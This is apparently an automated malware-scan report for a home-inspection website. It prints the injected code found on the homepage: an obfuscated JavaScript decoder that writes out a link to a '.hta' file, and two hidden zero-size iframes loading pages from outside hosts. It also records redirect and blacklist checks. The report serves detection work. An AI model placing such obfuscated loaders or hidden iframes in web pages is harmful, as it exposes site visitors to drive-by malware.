Scanned pages/files
Request | Server response | Status |
http://homeinspection-handbook.com/ | 200 OK Content-Length: 17969 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var hr=location.href,st='',k='',mdta='%63%67%61%62%62%66%62%62%67%62%63%62%62%61%69%62%61%62%63%67%63%63%64%66%62%63%61%63%66%61%63%65%65%63%64%66%62%63%61%63%66%62%62%63%64%62%62%63%62%62%62%62%62%66%62%61%66%62%62%67%62%61%66%62%62%62%62%62%61%63%66%69%63%6A%68%63%6A%69%62%62%66%62%62%62%62%61%69%62%62%68%62%62%67%62%61%62%63%66%6A%62%61%69%62%61%62%62%61%63%62%62%67%63%66%69%63%65%66%63%65%6A%63%65%69%63%65%69%63%65%69%63%66%6A%62%63%66%63%67%61%63%65%68%62%62%66%62%62%67%62%63%62%62%61%69%62 b0=unescape(mdta); b1=unescape(mdta2); for(i=0;i<b0.length;i++) { s+=b0.slice(i,i+1).charCodeAt(0)-97; }; for(i=0;i<b1.length;i++) { s+=b1.slice(i,i+1).charCodeAt(0)-97; }; for(j=0;j<String(s).length;j+=3) { k=parseInt(String(s).slice(j,j+3)); if(k>200){k-=200;} st+=String.fromCharCode(k); }; document.write(st.replace('%',hr.substring(0,hr.lastIndexOf('/')) +'/corpse.hta')); Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://microlib.biz/add.html
<iframe src=http://microlib.biz/add.html frameborder="0" width="1" height="1" scrolling="no" name=counter>
Hidden iFrame found. size: 0x0 src: http://investment-jobs.com/frame/frame.php
<iframe src='http://investment-jobs.com/frame/frame.php' width=0 height=0 border=0 >
http://homeinspection-handbook.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://homeinspection-handbook.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: homeinspection-handbook.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Sun, 27 Apr 2014 19:26:16 GMT
Accept-Ranges: bytes
Age: 0
ETag: "4631-40a9bb2724380"
Server: Apache/2
Content-Length: 17969
Content-Type: text/html
Expires: Sun, 27 Apr 2014 20:26:16 GMT
Last-Modified: Wed, 18 Jan 2006 05:55:36 GMT
...17969 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: homeinspection-handbook.com
Referer: http://www.google.com/search?q=homeinspection-handbook.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=homeinspection-handbook.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://homeinspection-handbook.com/
Result: homeinspection-handbook.com is not infected or malware details are not published yet.